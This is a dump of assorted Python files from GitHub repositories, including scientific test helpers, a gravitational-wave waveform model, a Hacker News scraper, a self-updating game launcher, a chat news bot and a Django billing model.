\"\"\"\n var2=67.3\n hdf5save(\"+test.h5\",'var2',\"/\")\n\ndef testaddgroup():\n \"\"\" Test to add a group \"\"\"\n var2=67.3\n var3=\"group test\"\n hdf5save(\"+test.h5\",'var2',\"/test\")\n\ndef testloadtypes():\n \"\"\" Test loading supported variable types \"\"\"\n hdf5load(\"test.h5\")\n return locals()\n\ndef testloadgroup():\n \"\"\" Test loading variables in a group\"\"\"\n hdf5load(\"test.h5\",\"/test\")\n\ndef hdf5test():\n \"\"\" Main test function \"\"\"\n savedict = testsavetypes()\n showfile()\n #print(savedict)\n loaddict = testloadtypes()\n #print(loaddict)\n if savedict == loaddict:\n print(\"load/save success!\")\n else:\n print(\"load/save FAILURE!\")\n testappend()\n showfile()\n testaddgroup()\n showfile()\n\nif __name__ == '__main__':\n 
hdf5test()\n","repo_name":"thuswa/pyhdf5io","sub_path":"test/hdf5test.py","file_name":"hdf5test.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37025938795","text":"from functools import partial\nimport sys\n\nfrom scipy.stats import wishart\nimport pandas as pd\nimport numpy as np\n\nfrom respy.python.shared.shared_auxiliary import replace_missing_values\nfrom respy.python.shared.shared_auxiliary import dist_class_attributes\nfrom respy.python.shared.shared_constants import TEST_RESOURCES_BUILD\nfrom respy.python.shared.shared_constants import DATA_FORMATS_SIM\nfrom respy.python.shared.shared_constants import DATA_LABELS_SIM\nfrom respy.python.shared.shared_auxiliary import create_draws\nfrom respy_smm.MaximumLikelihoodEstimation import MaximumLikelihoodEstimationCls\nfrom respy_smm.SimulationBasedEstimation import SimulationBasedEstimationCls\nfrom respy_smm.auxiliary_depreciation import respy_obj_from_new_init\nfrom respy.python.simulate.simulate_auxiliary import write_out\n\nfrom respy_smm.auxiliary import smm_sample_f2py, get_initial_conditions\nfrom respy_smm.auxiliary_depreciation import respy_ini_old_to_new\nfrom respy.tests.codes.random_init import generate_init\nimport os\nimport copy\nfrom respy.tests.codes.random_init import write_init_file\n\nsys.path.insert(0, TEST_RESOURCES_BUILD)\nimport f2py_interface as respy_f2py\n\n\ndef get_random_point(fname='test.respy.ini'):\n respy_base = respy_obj_from_new_init(fname)\n respy_base.paras_free = ~np.array(respy_base.get_attr('optim_paras')['paras_fixed'])\n values = list()\n bounds = respy_base.get_attr('optim_paras')['paras_bounds']\n for i, is_free in enumerate(respy_base.paras_free):\n if not is_free:\n continue\n lower, upper = [-99 * (-1) ** i if e is None else e for i, e in enumerate(bounds[i])]\n values.append(float(np.random.uniform(lower, upper, 1)))\n\n return np.array(values)\n\n\ndef get_random_init(constr=dict()):\n \"\"\"This is a wrapper around the RESPY functionality.\"\"\"\n if 'PMI_SIZE' not in os.environ.keys():\n constr['flag_parallelism_mpi'] = False\n\n # There are some keys that are not part of the RESPY constraints, so these need to be removed\n # first.\n constr_respy = copy.deepcopy(constr)\n constr_respy.pop('flag_agents_equality', None)\n constr_respy.pop('num_procs', None)\n\n constr_respy['flag_interpolation'] = False\n constr_respy['version'] = 'FORTRAN'\n init_dict = generate_init(constr_respy)\n\n # This constraint is not part of the original RESPY coded.\n if 'flag_agents_equality' in constr.keys():\n if constr['flag_agents_equality'] is True:\n init_dict['ESTIMATION']['agents'] = init_dict['SIMULATION']['agents']\n\n if 'num_procs'in constr.keys():\n init_dict['PROGRAM']['procs'] = constr['num_procs']\n\n write_init_file(init_dict)\n\n file_name = 'test.respy.ini'\n respy_ini_old_to_new(file_name, True, file_name)\n\n return init_dict\n\n\ndef get_observed_sample(fname='test.respy.ini'):\n \"\"\"This method simulates a sample based on the initialization file to serve as the\n observed dataset during testing.\n\n We are not using the RESPY capabilities directly as this results in conflicts in case of\n parallel executions with the nested MPIEXEC calls.\n \"\"\"\n respy_base = respy_obj_from_new_init(fname)\n\n labels = list()\n labels += ['num_procs', 'num_periods', 'is_debug', 'seed_emax', 'seed_sim']\n labels += ['num_draws_emax', 'num_agents_sim', 'num_types', 'edu_spec', 'version']\n\n 
num_procs, num_periods, is_debug, seed_emax, seed_sim, num_draws_emax, num_agents_sim, \\\n num_types, edu_spec, version = dist_class_attributes(respy_base, *labels)\n\n periods_draws_emax = create_draws(num_periods, num_draws_emax, seed_emax, is_debug)\n periods_draws_sims = create_draws(num_periods, num_agents_sim, seed_sim, is_debug)\n\n disturbances = (periods_draws_emax, periods_draws_sims)\n\n # We want to maintain a pure PYTHON version for testing purposes.\n args = list()\n args += [num_periods, num_types, edu_spec['start'], edu_spec['max'], edu_spec['max'] + 1]\n state_space_info = respy_f2py.wrapper_create_state_space(*args)\n\n initial_conditions = get_initial_conditions(respy_base)\n\n simulate_sample = partial(smm_sample_f2py, state_space_info, initial_conditions, disturbances,\n -99)\n\n data_array = replace_missing_values(simulate_sample(respy_base))\n data_frame = pd.DataFrame(data_array, columns=DATA_LABELS_SIM)\n data_frame = data_frame.astype(DATA_FORMATS_SIM)\n data_frame.set_index([\"Identifier\", \"Period\"], drop=False, inplace=True)\n\n write_out(respy_base, data_frame)\n\n return data_frame\n\n\ndef mock_get_weighing_matrix(df):\n num_moments = (df['Period'].max() + 1) * 4\n df = num_moments\n scale = np.identity(num_moments)\n return wishart.rvs(df, scale, size=1)\n\n\ndef mock_get_moments(df):\n moments = dict()\n moments['Choice Probability'] = dict()\n\n info = df['Choice'].groupby('Period').value_counts(normalize=True).to_dict()\n for period in sorted(df['Period'].unique().tolist()):\n moments['Choice Probability'][period] = []\n for choice in range(1, 5):\n try:\n stat = info[(period, choice)]\n except KeyError:\n stat = 0.00\n moments['Choice Probability'][period].append(stat)\n return moments\n\n\ndef run_regression_test(seed):\n\n np.random.seed(seed)\n\n # Generate a new regression vault ...\n get_random_init()\n df = get_observed_sample()\n\n weighing_matrix = mock_get_weighing_matrix(df)\n moments_obs = mock_get_moments(df)\n\n args = ('test.respy.ini', moments_obs, weighing_matrix, mock_get_moments, 5)\n est_obj = SimulationBasedEstimationCls(*args)\n fval_smm = est_obj.info['fval'][0]\n est_obj.terminate(True)\n\n est_obj = MaximumLikelihoodEstimationCls(*('test.respy.ini', 3))\n fval_mle = est_obj.info['fval'][0]\n est_obj.terminate(True)\n rslt = (fval_smm, fval_mle)\n\n return rslt\n","repo_name":"mo2561057/respy_estimagic","sub_path":"respy_smm/tests/auxiliary.py","file_name":"auxiliary.py","file_ext":"py","file_size_in_byte":5857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15625587309","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import interpolate\n\n# simple, early phenom frequency-space waveform according to Ajith et al. 
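`get_random_point` above substitutes a missing bound with `-99 * (-1) ** i`, which reads as a puzzle but just means -99 for the lower bound (i = 0) and +99 for the upper (i = 1). The same substitution written out explicitly (standalone, with made-up bounds):

import numpy as np

def fill_bounds(lower, upper, default=99.0):
    # None means unbounded on that side: substitute a wide finite default.
    return (-default if lower is None else lower,
            default if upper is None else upper)

rng = np.random.default_rng(0)
bounds = [(0.0, 1.0), (None, 5.0), (-2.0, None), (None, None)]
point = np.array([rng.uniform(*fill_bounds(lo, hi)) for lo, hi in bounds])
print(point)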
(2008)\n# https://arxiv.org/abs/0710.2335\n# Just calculating the amplitude and phase here (latter is relative, so you have to choose an offset)\n\na1 = 2.9740e-1\na2 = 5.9411e-1\na3 = 5.0801e-1\na4 = 8.4845e-1\n\nb1 = 4.4810e-2\nb2 = 8.9794e-2\nb3 = 7.7515e-2\nb4 = 1.2848e-1\n\nc1 = 9.5560e-2\nc2 = 1.9111e-1\nc3 = 2.2369e-2\nc4 = 2.7299e-1\n\n\n\ndef AmpLow(f,C,f1):\n\n return C*(f/f1)**(-7.0/6.0)\n\n\ndef AmpMid(f,C,f1):\n\n return C*(f/f1)**(-2.0/3.0)\n\n\ndef AmpHigh(f,C,f1,f2,sigma):\n\n w = (np.pi*sigma/2.0)*(f2/f1)**(-2.0/3.0)\n return C*w*(1.0/2.0/np.pi)*sigma/( (f-f2)**2 + sigma**2/4.0)\n\ndef getFmerge(M,eta):\n return (a1*eta**2 +b1*eta + c1)/np.pi/M\n\ndef getFring(M,eta):\n return (a2*eta**2 +b2*eta + c2)/np.pi/M\n\ndef getFcut(M,eta):\n return (a4*eta**2 +b4*eta + c4)/np.pi/M\n\n#Added by John\ndef getFisco(M,eta):\n '''\n Estimate of ISCO frequency \n '''\n af = 3.464102*eta - 3.82116*eta**2 + 3.79245*eta**3 #https://arxiv.org/pdf/1605.01938.pdf\n Z1 = 1 + ( 1 - af**2 )**(1/3) * ( (1+af)**(1/3) + (1-af)**(1/3) )\n Z2 = (3*af**2 + Z1**2)**.5\n rISCO = 3 + Z2 - ( (3-Z1)*(3+Z1+2*Z2) )**.5\n OmegaISCO = 1/(rISCO**1.5+af) #Orbital\n return OmegaISCO/M/np.pi\n\n# get the amplitude as a function of frequency, total mass, reduced mass ratio, and distance\ndef binaryAmp(f,M,eta,d=1.0):\n\n\n #alpha1\n fmerg = getFmerge(M,eta)\n\n fring = getFring(M,eta)\n\n sigma = (a3*eta**2 +b3*eta + c3)/np.pi/M\n\n fcut = getFcut(M,eta)\n\n # Eq. 4.17\n C = M**(5.0/6.0)*fmerg**(-7.0/6.0)*np.sqrt(5.0*eta/24.0)/d/np.pi**(2.0/3.0)\n\n freqs = f\n\n amp1_vals = AmpLow(freqs,C,fmerg)\n amp2_vals = AmpMid(freqs,C,fmerg)\n amp3_vals = AmpHigh(freqs,C,fmerg,fring,sigma)\n\n f_in_bin1 = freqs < fmerg\n f_in_bin2 = (freqs >= fmerg) & (freqs < fring)\n f_in_bin3 = freqs >= fring\n\n amp_vals = f_in_bin1*amp1_vals + f_in_bin2*amp2_vals + f_in_bin3*amp3_vals\n\n # phase calculation\n x0 = 1.7516e-1\n x2 = -5.1571e1\n x3 = 6.5866e2\n x4 = -3.9031e3\n x6 = -2.4874e4\n x7 = 2.5196e4\n\n y0 = 7.9483e-2\n y2 = -1.7595e1\n y3 = 1.7803e2\n y4 = -7.7493e2\n y6 = -1.4892e3\n y7 = 3.3970e2\n\n z0 = -7.2390e-2\n z2 = 1.3253e1\n z3 = -1.5972e2\n z4 = 8.8195e2\n z6 = 4.4588e3\n z7 = -3.9573e3\n\n psi0 = (x0*eta**2 + y0*eta + z0)/eta/(np.pi*M)**( (5.0-0)/3.0)\n psi2 = (x2*eta**2 + y2*eta + z2)/eta/(np.pi*M)**( (5.0-2)/3.0)\n psi3 = (x3*eta**2 + y3*eta + z3)/eta/(np.pi*M)**( (5.0-3)/3.0)\n psi4 = (x4*eta**2 + y4*eta + z4)/eta/(np.pi*M)**( (5.0-4)/3.0)\n psi6 = (x6*eta**2 + y6*eta + z6)/eta/(np.pi*M)**( (5.0-6)/3.0)\n psi7 = (x7*eta**2 + y7*eta + z7)/eta/(np.pi*M)**( (5.0-7)/3.0)\n\n t0 = 0.0\n phi0 = -5400.0\n\n phase_vals = 2.0*np.pi*freqs*t0 + phi0\n phase_vals = phase_vals + psi0*freqs**( (0-5.0)/3.0)\n phase_vals = phase_vals + psi2*freqs**( (2-5.0)/3.0)\n phase_vals = phase_vals + psi3*freqs**( (3-5.0)/3.0)\n phase_vals = phase_vals + psi4*freqs**( (4-5.0)/3.0)\n phase_vals = phase_vals + psi6*freqs**( (6-5.0)/3.0)\n phase_vals = phase_vals + psi7*freqs**( (7-5.0)/3.0)\n\n h = amp_vals*np.exp(1j*phase_vals)\n\n return h\n\n# get *just* the amplitude as a function of frequency, total mass, reduced mass ratio, and distance\ndef binaryAmpOnly(f,M,eta,d=1.0):\n\n\n #alpha1\n fmerg = getFmerge(M,eta)\n\n fring = getFring(M,eta)\n\n sigma = (a3*eta**2 +b3*eta + c3)/np.pi/M\n\n fcut = getFcut(M,eta)\n\n # Eq. 
4.17\n C = M**(5.0/6.0)*fmerg**(-7.0/6.0)*np.sqrt(5.0*eta/24.0)/d/np.pi**(2.0/3.0)\n\n freqs = f\n\n amp1_vals = AmpLow(freqs,C,fmerg)\n amp2_vals = AmpMid(freqs,C,fmerg)\n amp3_vals = AmpHigh(freqs,C,fmerg,fring,sigma)\n\n f_in_bin1 = freqs < fmerg\n f_in_bin2 = (freqs >= fmerg) & (freqs < fring)\n f_in_bin3 = freqs >= fring\n\n amp_vals = f_in_bin1*amp1_vals + f_in_bin2*amp2_vals + f_in_bin3*amp3_vals\n \n return amp_vals\n\ndef ThetaFromT(t,M,eta,t_merge=0):\n return (eta/(5*M))*(t_merge - t)\n\ndef tFromTheta(theta,M,eta,t_merge=0):\n return t_merge - theta*(5*M/eta)\n\n# get the approximate time (to merger) for a given frequency\ndef tFromF(f,M,eta, t_merge=0):\n Thetavals = (8*M*f*np.pi)**(-8/3)\n return tFromTheta(Thetavals,M,eta,t_merge)\n \n# get the frequency as a function of time\ndef fFromT(t,M,eta=0.25,t_merge=0):\n \n # Definition of Theta(t) from Eq. (315) of Blanchet's Living Review [https://arxiv.org/abs/1310.1528]\n Thetavals = ThetaFromT(t,M,eta,t_merge)\n #print('args:',t,M,eta,t_merge)\n #print('Thetavals',Thetavals)\n\n # taking this to the negative-one-eighth power to give the actual PN expansion parameter\n ThetaNEG8vals = Thetavals**(-0.125)\n\n # Expressions taken from Eq (316) of Blanchet's Living Review [https://arxiv.org/abs/1310.1528]\n # First few terms in the braces\n\n fac0 = 1.0\n\n fac2 = 743.0/4032.0 + 11.0/48.0*eta\n\n fac3 = -np.pi/5\n\n fac4 = 19583.0/254016.0 + 24401.0/193536.0*eta + 31.0/288.0*eta**2\n\n fac5 = (-11891.0/53760.0 + 109.0/1920.0*eta)*np.pi\n\n xvals = 0.25*ThetaNEG8vals**2*( fac0 + fac2*ThetaNEG8vals**2+ fac3*ThetaNEG8vals**3 + fac4*ThetaNEG8vals**4 + fac5*ThetaNEG8vals**5)\n #print('xvals',xvals)\n \n # compute orbital angular frequency\n omegavals = (xvals**1.5)/M\n \n # return GW frequency\n fvals = 2.0*omegavals/(2.0*np.pi)\n\n #for scalar or array, if x<=0 set fval to nan\n fvals = np.choose(xvals>0,[float('nan'),np.real(fvals)]) \n #print('fvals',fvals)\n return fvals\n\n# get t(f from phase) t=(1/2pi)*dphase/df\n#John's calc\ndef t_of_f(f,M,eta,d=1.0,zero_at_f=0):\n\n # phase calculation\n x0 = 1.7516e-1\n x2 = -5.1571e1\n x3 = 6.5866e2\n x4 = -3.9031e3\n x6 = -2.4874e4\n x7 = 2.5196e4\n\n y0 = 7.9483e-2\n y2 = -1.7595e1\n y3 = 1.7803e2\n y4 = -7.7493e2\n y6 = -1.4892e3\n y7 = 3.3970e2\n\n z0 = -7.2390e-2\n z2 = 1.3253e1\n z3 = -1.5972e2\n z4 = 8.8195e2\n z6 = 4.4588e3\n z7 = -3.9573e3\n\n psi0 = (x0*eta**2 + y0*eta + z0)/eta/(np.pi*M)**( (5.0-0)/3.0)\n psi2 = (x2*eta**2 + y2*eta + z2)/eta/(np.pi*M)**( (5.0-2)/3.0)\n psi3 = (x3*eta**2 + y3*eta + z3)/eta/(np.pi*M)**( (5.0-3)/3.0)\n psi4 = (x4*eta**2 + y4*eta + z4)/eta/(np.pi*M)**( (5.0-4)/3.0)\n psi6 = (x6*eta**2 + y6*eta + z6)/eta/(np.pi*M)**( (5.0-6)/3.0)\n psi7 = (x7*eta**2 + y7*eta + z7)/eta/(np.pi*M)**( (5.0-7)/3.0)\n\n t0 = 0.0\n phi0 = -5400.0\n\n dphase_vals = 2.0*np.pi*t0\n dphase_vals = dphase_vals + psi0*f**( (0-5.0)/3.0 -1 )*(0-5.0)/3.0\n dphase_vals = dphase_vals + psi2*f**( (2-5.0)/3.0 -1 )*(2-5.0)/3.0\n dphase_vals = dphase_vals + psi3*f**( (3-5.0)/3.0 -1 )*(3-5.0)/3.0\n dphase_vals = dphase_vals + psi4*f**( (4-5.0)/3.0 -1 )*(4-5.0)/3.0\n dphase_vals = dphase_vals + psi6*f**( (6-5.0)/3.0 -1 )*(6-5.0)/3.0\n dphase_vals = dphase_vals + psi7*f**( (7-5.0)/3.0 -1 )*(7-5.0)/3.0\n\n t=-dphase_vals/2/np.pi\n if zero_at_f>0: \n t0=t_of_f(zero_at_f,M,eta)\n #print('t0=',t0)\n t=t-t0\n \n return 
t\n","repo_name":"JohnGBaker/GWI-metrics","sub_path":"src/PhenomWaveform_nonspinning.py","file_name":"PhenomWaveform_nonspinning.py","file_ext":"py","file_size_in_byte":7105,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"3925351540","text":"#!/usr/local/bin/python3\nimport sys\nimport argparse\nfrom argparse import RawTextHelpFormatter\nimport os\n\nif f\"{os.environ['DYLINX_HOME']}/python\" not in sys.path:\n sys.path.append(f\"{os.environ['DYLINX_HOME']}/python\")\nfrom Dylinx import NaiveSubject\n\ndef main(args):\n subject = NaiveSubject(args.config_path)\n for i in range(subject.get_num_perm()):\n subject.step(i)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter)\n parser.add_argument(\n \"-m\",\n \"--mode\",\n type=str,\n choices=[\"reverse\", \"optimize_locks\", \"fix\"],\n required=True,\n help=\"Configuring the operating mode.\"\n )\n parser.add_argument(\n \"-c\",\n \"--config_path\",\n type=str,\n default=f\"{os.getcwd()}/dylinx-config.yaml\",\n help=\n \"Specify the path of subject's config file. It should contain following component\"\n \"\\n1. compile_commands_path\"\n \"\\n2. output_directory_path\"\n \"\\n3. instructions\"\n \"\\n - build_commands\"\n \"\\n - clean_commands\"\n )\n args = parser.parse_args()\n main(args)\n","repo_name":"posutsai/Dylinx","sub_path":"sample/memcached/naive.py","file_name":"naive.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15562084478","text":"import requests \n\npage = requests.get(\"https://hacker-news.firebaseio.com/v0/topstories.json\")\npage.encoding ='utf-8'\nchanging_url = 'https://hacker-news.firebaseio.com/v0/item/16619917.json'\nprint(page.status_code)\ncontent = page.json()\n\n\n#print('json', page.json())\n#print(dir(page))\n#print(help(page.json))\nurls = []\nhtml = \"\\n\"\nfor i in content:\n urls.append(f'https://hacker-news.firebaseio.com/v0/item/{i}.json')\n\nfor url in urls:\n res = requests.get(url)\n ans:dict = res.json()\n #print(ans.keys())\n\n link = ans.get('url')\n author=ans['by']\n title = ans['title']\n type_ = ans['type']\n\n htmlrepr = f\"\"\"\n
<div>\n    {title}\n    by {author}\n    type:{type_}\n    <a href = {link}>Read more </a>\n    
\\n\n \"\"\"\n print(htmlrepr)\n html+=htmlrepr\n with open('api.html', 'a') as api:\n api.write(html)\n\nhtml.join(\"\")\nwith open('api.html', 'w') as api:\n api.write(html)\n# #print(urls)\n\n","repo_name":"Firebreather-heart/case-study","sub_path":"playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21799188412","text":"import tkinter as tk\nimport urllib.request\nimport subprocess\nimport os\n\n## Update self\nprint(\"Updating launcher...\")\nlink = \"https://raw.githubusercontent.com/kjniemela/Skylands-WFA/master/launcher.py\"\nf = urllib.request.urlopen(link)\nnew_launcher = f.read()\nf.close()\n\nf = open(\"launcher.py\", \"wb\")\nf.write(new_launcher)\nf.close()\n\ntry:\n f = open(\"Skylands/version.txt\")\n cur_version = f.read()\n f.close()\nexcept FileNotFoundError:\n cur_version = None\n\n## Callbacks\ndef check():\n global update_window\n global button_install\n global button_cancel\n\n version_file_link = \"https://raw.githubusercontent.com/kjniemela/Skylands-WFA/master/version.txt\"\n f = urllib.request.urlopen(version_file_link)\n new_version = f.read().decode()\n f.close()\n print(\"Current Version:\", cur_version)\n print(\"Latest Version:\", new_version)\n\n update_window = tk.Toplevel()\n update_window.title(\"Check for updates\")\n update_window.minsize(width=400, height=100)\n\n if new_version == cur_version:\n message = \"You are running the latest version of Skylands WFA (%s).\" % (cur_version)\n elif cur_version == None:\n message = \"Skylands WFA is currently not installed on your device. Do you want to download and install the latest version (%s)?\" % (new_version)\n else:\n message = \"You are running Skylands WFA (%s). A new version (%s) is available. Do you want to download and install it?\" % (cur_version, new_version)\n\n msg = tk.Message(update_window, text=message, font=(\"Helvetica\", 11))\n msg.pack(padx=12, pady=12)\n\n if new_version == cur_version:\n button = tk.Button(update_window, text=\"Ok\", command=update_window.destroy)\n button.pack()\n else:\n button_install = tk.Button(update_window, text=\"Install\", command=install_latest)\n button_install.pack()\n\n button_cancel = tk.Button(update_window, text=\"Cancel\", command=update_window.destroy)\n button_cancel.pack()\n\ndef install_latest():\n global update_window\n global button_install\n global button_cancel\n global cur_version\n\n button_install.config(state=tk.DISABLED)\n button_cancel.config(state=tk.DISABLED)\n\n filepaths_link = \"https://raw.githubusercontent.com/kjniemela/Skylands-WFA/master/filepaths\"\n f = urllib.request.urlopen(filepaths_link)\n filepaths = f.read().decode().split(\"\\n\")\n f.close()\n\n if not os.path.exists(\"Skylands\"):\n os.mkdir(\"Skylands\")\n\n i = 0\n for filepath in filepaths:\n link = \"https://raw.githubusercontent.com/kjniemela/Skylands-WFA/master/\" + filepath\n link = link.replace(\" \", \"%20\")\n f = urllib.request.urlopen(link)\n data = f.read()\n f.close()\n\n dir_name = \"/\".join(filepath.split(\"/\")[:-1])\n print(\"Downloading\", filepath)\n if not dir_name == \"\" and not os.path.exists(\"Skylands/\" + dir_name):\n os.makedirs(\"Skylands/\" + dir_name)\n\n f = open(\"Skylands/\" + filepath, \"wb\")\n f.write(data)\n f.close()\n\n\n update_window.title(\"Installing... 
%d\" % (round((i / len(filepaths)) * 100)) + \"%\")\n master.update()\n i += 1\n\n f = open(\"Skylands/version.txt\")\n cur_version = f.read()\n f.close()\n\n launch_btn.config(state=tk.NORMAL)\n launch_btn.config(text=\"Launch Skylands WFA v%s\" % (cur_version))\n\n top = tk.Toplevel(update_window)\n top.title(\"Install successful\")\n top.resizable(False, False)\n \n msg = tk.Message(top, text=\"Skylands WFA version %s installed successfully!\" % (cur_version), font=(\"Helvetica\", 11))\n msg.pack(padx=12, pady=12)\n\n button = tk.Button(top, text=\"Ok\", command=update_window.destroy)\n button.pack()\n\ndef launch(flags=[]):\n print(\"Launching Skylands WFA version\", cur_version)\n python_dir = \"/\".join(os.__file__.replace(\"\\\\\", \"/\").split(\"/\")[:-2])\n cmd = [python_dir + \"/pythonw\", \"main.py\"]\n cmd += flags\n print(cmd)\n subprocess.Popen(cmd, cwd=\"Skylands\")\n exit() ## TODO maybe use sys.exit? - or have the launcher continue in the background\n\ndef launch_debug():\n launch(flags=[\"-D\"])\n\ndef settings():\n print(\"SETTINGS\")\n\nmaster = tk.Tk()\nmaster.title('Skylands Launcher')\n\nupdate_window = None\nbutton_install = None\nbutton_cancel = None\n\ngreeting = tk.Label(master, text=\"Skylands WFA - Launcher\", font=(\"Helvetica\", 24))\ngreeting.pack(padx=48, pady=48)\n\nbtn_frame = tk.Frame(master)\nbtn_frame.pack()\n\ncheck_btn = tk.Button(btn_frame, text=\"Check for Updates\", command=check)\ncheck_btn.pack(side=tk.LEFT)\nlaunch_btn = tk.Button(\n btn_frame,\n text=\"Launch Skylands WFA\" + (\" v%s\" % (cur_version) if cur_version != None else \"\"),\n command=launch,\n state=tk.NORMAL if cur_version != None else tk.DISABLED\n)\nlaunch_btn.pack(side=tk.LEFT)\ndebug_btn = tk.Button(btn_frame, text=\"Launch in Debug Mode\", command=launch_debug)\ndebug_btn.pack(side=tk.LEFT)\nsettings_btn = tk.Button(btn_frame, text=\"Settings\", command=settings)\nsettings_btn.pack(side=tk.LEFT)\n\nmaster.mainloop()","repo_name":"kjniemela/Skylands-WFA","sub_path":"launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":5003,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"28897829307","text":"# https://leetcode.com/problems/image-overlap/description/\n# https://leetcode.com/problems/image-overlap/solutions/130623/c-java-python-straight-forward/\n\nimport collections\n\n\n# TC:O(N^2), SC:O(N^2)\ndef largestOverlap(img1: List[List[int]], img2: List[List[int]]) -> int:\n # find same transform vector, (xi-xj, yi-yj), return max count is the max overlapping area\n # n = len(img1)\n non_zero1 = [(i, j) for i in range(len(img1)) for j in range(len(img1[0])) if img1[i][j] != 0]\n non_zero2 = [(i, j) for i in range(len(img2)) for j in range(len(img2[0])) if img2[i][j] != 0]\n counter = collections.Counter((xi - xj, yi - yj) for (xi, yi) in non_zero1 for (xj, yj) in non_zero2)\n return max(counter.values()) if len(counter) != 0 else 0","repo_name":"ychanc2104/LeetCode","sub_path":"Image Overlap.py","file_name":"Image Overlap.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"12335663437","text":"#!/usr/bin/env python3\n\nfrom config import Config\nfrom bot import Bot\n\nimport asyncio\nimport feedparser\n\n\ndef get_rss_news(url: str, existing_links: list) -> str:\n news = []\n new_links = []\n data = feedparser.parse(url)\n feed_title = data.feed[\"title\"]\n\n for entry in data.entries:\n title = 
entry[\"title\"]\n link_key = \"link\"\n\n # Some news feeds such as Hacker News, I'd prefer to have the link\n # to comments instead.\n\n if feed_title == \"Hacker News\":\n link_key = \"comments\"\n\n link = entry[link_key].replace(\"http://\", \"https://\")\n\n if link in existing_links:\n continue\n\n news.append(f\"{title}\\n{link}\")\n new_links.append(link)\n\n if len(news) <= 0:\n return None\n\n news.insert(0, feed_title)\n news.append(\"\\n\")\n\n return \"\\n\\n\".join(news)\n\n\ndef send_news(bot: Bot, config: Config):\n for news_item in config.get_news():\n room_id = config.get_room_id(news_item.get_room())\n news = get_rss_news(\n url=news_item.get_url(), existing_links=bot.get_room_links(room_id)\n )\n\n if news == None:\n continue\n\n bot.send_message(content=news, room_id=room_id)\n\n\nif __name__ == \"__main__\":\n config = Config()\n bot = Bot(config)\n\n try:\n send_news(bot=bot, config=config)\n finally:\n bot.close_client()\n","repo_name":"HuyNguyenAu/matrix-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71603193769","text":"#pip install pyaudio | pip install SpeechRecognition | pip install os_sys | https://www.lfd.uci.edu/~gohlke/pythonlibs/#pyaudio -> pip install CaminhoDoArquivo \r\n\r\nimport speech_recognition as sr\r\nimport os\r\n\r\ndef ouvir_microfone():\r\n microfone = sr.Recognizer()\r\n\r\n with sr.Microphone() as source:\r\n microfone.adjust_for_ambient_noise(source)\r\n print(\"Diga alguma coisa: \")\r\n audio = microfone.listen(source)\r\n\r\n try:\r\n frase = microfone.recognize_google(audio,language=\"pt-BR\")\r\n print(\"Voce disse: \"+frase)\r\n\r\n if \"nagevador\" in frase:\r\n os.system(\"start Chorme.exe\")\r\n\r\n except sr.UnknownValueError:\r\n print(\"Não entedi\")\r\n return frase\r\n\r\nouvir_microfone()\r\n","repo_name":"kaiquesouzasantos/estudos-python","sub_path":"Scripts/Reconhecimento/ReconhecimentoDeVoz.py","file_name":"ReconhecimentoDeVoz.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31077345316","text":"import logging\nimport decimal\nfrom django.db import models\nfrom django.db.models import F, Sum\nfrom django.db.models.functions import Coalesce\nfrom django.utils.translation import ugettext_lazy as _\nfrom jsonfield import JSONField\n\nfrom fleio.billing.settings import CyclePeriods\nfrom .service import Service\nfrom .cart import FleioCart\nfrom .order import Order\nfrom .product import Product\nfrom .product_cycle import ProductCycle\n\nLOG = logging.getLogger(__name__)\n\n\nclass OrderItemTypes(object):\n service = 'service'\n serviceUpgrade = 'serviceUpgrade'\n credit = 'credit'\n other = 'other'\n\n CHOICES = ((service, _('Service')),\n (serviceUpgrade, _('Service Upgrade')),\n (credit, _('Credit Balance')),\n (other, _('Other')))\n\n def __contains__(self, item):\n return item in [c[0] for c in self.CHOICES]\n\n\nclass OrderItemQuerySet(models.QuerySet):\n def total_price(self):\n \"\"\"Total price for items with config options and taxes\"\"\"\n with_opts = self.annotate(config_options_total=Sum('configurable_options__price') +\n Sum('configurable_options__setup_fee'))\n return with_opts.aggregate(total=Sum(F('fixed_price') + F('setup_fee')) +\n Coalesce(Sum('config_options_total'), 0) +\n Coalesce(Sum('taxes__amount'), 0))['total']\n\n\nclass 
OrderItem(models.Model):\n cart = models.ForeignKey(FleioCart, related_name='items', null=True, blank=True, on_delete=models.CASCADE)\n order = models.ForeignKey(Order, related_name='items', null=True, blank=True, on_delete=models.CASCADE)\n item_type = models.CharField(choices=OrderItemTypes.CHOICES, db_index=True, max_length=16)\n product = models.ForeignKey(Product, null=True, blank=True, on_delete=models.CASCADE)\n cycle = models.ForeignKey(ProductCycle, null=True, blank=True, on_delete=models.CASCADE)\n service = models.ForeignKey(Service, related_name='order_item', null=True, blank=True, db_index=True,\n on_delete=models.SET_NULL)\n taxable = models.BooleanField(default=False)\n setup_fee = models.DecimalField(max_digits=12, decimal_places=2, default='0.00')\n fixed_price = models.DecimalField(max_digits=12, decimal_places=2, default='0.00')\n name = models.CharField(max_length=128, default='Product')\n description = models.CharField(max_length=255, default='')\n cycle_display = models.CharField(max_length=128, null=True, blank=True)\n plugin_data = JSONField(default={}, max_length=4096)\n quantity = models.PositiveIntegerField(default=1)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n domain_name = 